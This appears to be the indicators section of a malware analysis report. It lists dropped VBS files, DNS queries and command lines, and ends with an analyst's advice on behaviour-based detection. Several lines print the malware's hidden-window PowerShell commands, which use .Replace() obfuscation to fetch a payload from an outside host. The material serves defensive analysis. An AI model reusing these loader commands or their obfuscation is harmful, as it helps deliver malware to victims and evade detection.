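Technical Information
The sub-headings of this section appear to be missing from this copy. The entries below are, in order: file-system paths of two VBS scripts (whether each was created, modified or deleted is not shown), outbound connections on port 443, DNS queries, and process command lines. Characters replaced by '#' in host names are masked in the source.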
- %LOCALAPPDATA%\microsoft\ml.vbs
- %LOCALAPPDATA%\microsoft\fick.vbs
- %LOCALAPPDATA%\microsoft\fick.vbs
- %LOCALAPPDATA%\microsoft\ml.vbs
- '2n#.co':443
- '2n#.co':443
- DNS ASK 2n#.co
- DNS ASK mi###ore.top
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\Microsoft\ML.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\Microsoft\FICK.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='ht[P][O][W][E][R]tp://mi[P][O][W][E][R]ranore.[P][O][W][E][R]top/11[P][O][W][E][R]HHHHHHHHHHHHHHHH/FFFF[P][O][W][E][R]FFFFFF/FI[P][O][W][E][R]CK.PNG'.Replace('[P][O][W][E][R]','');$sss= '...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='h>>>[CODE]<<<ttp:>>>[CODE]<<<//>>>[CODE]<<<miranore.>>>[CODE]<<<top/11HHHHHHHHHHHHHHHH/LLLLLLLLLLLLLLLLL/ID.>>>[CODE]<<<PN>>>[CODE]<<<G'.Replace('>>>[CODE]<<<','');$sss= '(NESTRDTYUGIHGYF...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='ht[P][O][W][E][R]tp://mi[P][O][W][E][R]ranore.[P][O][W][E][R]top/11[P][O][W][E][R]HHHHHHHHHHHHHHHH/FFFF[P][O][W][E][R]FFFFFF/FI[P][O][W][E][R]CK.PNG'.Replace('[P][O][W][E][R]','');$sss= '...
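- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='h>>>[CODE]<<<ttp:>>>[CODE]<<<//>>>[CODE]<<<miranore.>>>[CODE]<<<top/11HHHHHHHHHHHHHHHH/LLLLLLLLLLLLLLLLL/ID.>>>[CODE]<<<PN>>>[CODE]<<<G'.Replace('>>>[CODE]<<<','');$sss= '(NESTRDTYUGIHGYF...
Note: in each PowerShell command line above, the .Replace(...) call strips a filler token ('[P][O][W][E][R]' or '>>>[CODE]<<<') from the $www string, leaving a plain http:// URL on miranore[.]top whose path ends in FICK.PNG or ID.PNG. The host is consistent with the masked DNS entry mi###ore.top. Because the literal URL never appears contiguously on the command line, detection is better keyed on behaviour: wscript.exe running a .vbs from %LOCALAPPDATA%\Microsoft, and powershell.exe started with a hidden window and an inline string assembled through .Replace(). The $sss value is truncated here, so what is done with the downloaded content cannot be determined from this listing; the .PNG extension alone does not establish that the response is an image.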